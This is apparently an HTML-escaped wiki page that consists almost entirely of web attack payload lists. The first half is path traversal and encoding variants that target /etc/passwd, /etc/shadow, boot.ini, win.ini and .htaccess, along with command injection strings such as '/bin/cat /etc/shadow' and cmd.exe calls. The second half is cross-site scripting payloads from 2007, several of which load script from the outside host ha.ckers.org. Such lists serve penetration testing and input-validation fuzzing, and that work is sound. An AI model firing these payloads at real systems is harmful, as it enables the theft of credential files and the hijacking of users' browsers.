%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
